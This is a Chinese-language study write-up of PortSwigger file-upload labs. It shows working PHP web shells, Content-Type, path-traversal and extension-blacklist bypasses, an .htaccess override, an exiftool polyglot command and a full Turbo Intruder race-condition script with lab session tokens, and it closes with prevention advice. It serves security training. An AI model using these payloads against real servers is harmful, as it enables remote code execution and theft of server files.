文件上传(一)：PortSwigger靶场通关笔记

写在前面

该文章是作者在portswigger的文件上传漏洞靶场训练的过程记录以及学习笔记 使用的工具为burpsuite pro

漏洞简介

文件上传漏洞通常指应用对用户上传的文件没有完善的检验，允许攻击者通过web应用程序上传恶意文件到服务器，然后通过这些恶意文件来进行执行任意代码，在客户端影响用户等攻击

lab1：通过上传web shell来远程执行命令

lab地址：remote code execution via web shell upload

<?php echo file_get_contents('/home/carlos/secret'); ?>

该lab没有任何的防御措施，直接上传php脚本即可，访问拿到密钥通过

lab2：绕过content-type限制上传web shell

lab地址：web shell upload via content-type restriction bypass

某些情景下，web应用可能通过请求中content-type字段判断上传文件的类型，这种时候我们可以上传脚本，抓包，修改content-type来绕过限制

该lab直接上传脚本会被拦截 修改content-type的值为image/jpeg，成功上传

lab3：通过路径遍历上传web shell

lab地址：web shell upload via path traversal

某些情景下，web应用会对存放用户上传文件的文件夹做限制，可能不给执行文件的权限，这种情况下，可以尝试通过路径遍历的方式上传文件到其他文件夹

打开lab，尝试通过路径遍历上传文件，发现路径遍历序列(../)被过滤了 尝试对路径遍历序列进行url编码，发现上传成功 读取上传的文件，注意路径是上一级目录

lab4：绕过文件扩展名黑名单上传web shell

lab地址：web shell upload via extension blacklist bypass

某些情景下，web应用对用户上传的文件的扩展名做了限制，但是使用的是黑名单机制，这种情况下，我们可以尝试用以下几种方式进行绕过

• 使用不常见的后缀名：php5,pht,phpt,phtml,php3,php4,php5,php6
• 使用大小写：.php
• 重写服务器配置文件：apache的.htaccess或者iis的web.config
• 使用多扩展名，譬如example.php.jpg，这种方式依赖于服务器如何解析文件，如果服务器从前往后解析，并且解析到第一个扩展名就停止解析 ，则该文件会被当作example.php存储
• 添加尾随字符，有些组件可能会过滤或忽视文件名末尾的空格或小数点，譬如example.php.或example.php (末尾有一个空格)
• 尝试使用url编码，譬如：example%2ephp
• 再文件扩展名前添加分号或者url编码的空字符，譬如：example.php;jpg或example.php%00.jpg
• 使用多字节unicode字符，譬如unicode字符序列：xc0 xae，xc4 xae，xc0 x2e再utf-8编码下可能转化为x2e，然后转化为ascii字符使用

该lab使用的是apache的web容器，不解析php5后缀的文件，我们可以分两步走，第一次先上传.htaccess文件，文件内容如下

addtype application/x-httpd-php .php5

第二次再上传php5文件，然后访问拿到密钥字符串

lab5：通过混淆扩展名上传web shell

lab地址：web shell upload via obfuscated file extension

该lab的目的还是对黑名单的绕过，使用多扩展名和空字符隔断来达成目的

lab6：通过上传多态web shell来远程执行命令

lab地址：remote code execution via polyglot web shell upload

某些情景下，web应用会对上传文件的内容做校验，如果没有识别到预期的特征码，则会报错。譬如jepg文件以字节ff d8 ff开头，如果web应用没有在文件开头检测到ff d8 ff，则不予通过。这种情况下，可以通过exiftool或其他工具来修改文件元数据，插入脚本生成多态jpeg文件进行绕过 exiftool命令：

exiftool -comment="<?php echo 'start ' . file_get_contents('/home/carlos/secret') . ' end'; ?>" <your-input-image>.jpg -o polyglot.php

lab7：通过条件竞争上传web shell

lab地址：web shell upload via race condition

某些情景下，web应用会先将文件存放在文件夹， 然后对文件进行检验，如果检验不通过，则删除文件。 这种情况下，检验文件需要花费时间，可以尝试通过条件竞争（也就是并发请求）来访问上传的文件

通过该lab的过程使用了burpsuite的turbo intruder插件，可以从插件商店获取 思路如下：先上传脚本文件，然后并发请求脚本文件 将上传文件的post请求发送到turbo intruder中 运行脚本，得到的返回结果中有一个状态码200的响应 turbo intruder脚本如下： request1就是上传脚本的post请求，request2就是访问脚本的get请求

def queuerequests(target, wordlists):
    # 创建一个请求引擎实例，设置目标端点和并发连接数为10
    engine = requestengine(endpoint=target.endpoint, concurrentconnections=10,)

    # 定义第一个请求，发送一个包含php shell代码的post请求
    request1 = '''post /my-account/avatar http/2
host: 0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net
cookie: session=ytriml41vqc9ht9zuultsg0n3hvhyv1k
content-length: 474
cache-control: max-age=0
sec-ch-ua: "not/a)brand";v="8", "chromium";v="126", "google chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "windows"
upgrade-insecure-requests: 1
origin: https://0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net
content-type: multipart/form-data; boundary=----webkitformboundary5enuwu47mkxzu1bo
user-agent: mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/126.0.0.0 safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net/my-account?id=wiener
accept-encoding: gzip, deflate, br
accept-language: zh-cn,zh;q=0.9
priority: u=0, i

------webkitformboundary5enuwu47mkxzu1bo
content-disposition: form-data; name="avatar"; filename="shell.php"
content-type: application/octet-stream

<?php echo file_get_contents('/home/carlos/secret'); ?>
------webkitformboundary5enuwu47mkxzu1bo
content-disposition: form-data; name="user"

wiener
------webkitformboundary5enuwu47mkxzu1bo
content-disposition: form-data; name="csrf"

zrwxp2w3zbeprteru2qzyfpvsmtao8vl
------webkitformboundary5enuwu47mkxzu1bo--
'''

    # 定义第二个请求，发送一个get请求来访问上传的php shell文件
    request2 = '''get /files/avatars/shell.php http/2
host: 0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net
cookie: session=ytriml41vqc9ht9zuultsg0n3hvhyv1k
sec-ch-ua: "not/a)brand";v="8", "chromium";v="126", "google chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "windows"
upgrade-insecure-requests: 1
user-agent: mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/126.0.0.0 safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net/my-account/avatar
accept-encoding: gzip, deflate, br
accept-language: zh-cn,zh;q=0.9
priority: u=0, i

'''

    # 使用 'race1' 标签将第一个请求排队，并阻止该请求的最后一个字节直到调用 opengate
    engine.queue(request1, gate='race1')
    # 将第二个请求排队5次，使用相同的 'race1' 标签
    for x in range(5):
        engine.queue(request2, gate='race1')

    # 等待所有带有 'race1' 标签的请求准备就绪
    # 然后发送每个请求的最后一个字节
    # (此方法是非阻塞的，就像 queue 方法一样)
    engine.opengate('race1')

    # 完成所有请求，设置超时时间为60秒
    engine.complete(timeout=60)


def handleresponse(req, interesting):
    table.add(req)

文件上传漏洞非rce利用

stored-xss

上传包含javascript代码或内联javascript的脚本文件，如果在其它页面被用户访问，就可以造成xss漏洞

xxe

如果系统正确，安全的对上传文件进行处理和存储，可以尝试在解析文件过程中测试漏洞，例如解析microsoft office的docx文件，xls文件等类型的文件，可能会有xxe漏洞的风险

如何防止文件上传

防止文件上传漏洞的产生需要一套组合拳，组合如下：

1. 限制上传文件的后缀，推荐采用白名单而非黑名单机制，黑名单机制非常容易出现不全面的情况，导致被绕过
2. 确保上传文件的文件名没有包含可能被当作目录或目录遍历序列 (../)的字符串
3. 重命名上传文件，避免已存在文件被重写（主要是避免配置文件被重写）
4. 在彻底检验通过前不要将文件上传到服务器的文件系统
5. 如果可能，最好使用稳定，成熟的框架来处理文件上传，而不是使用自己写的校验机制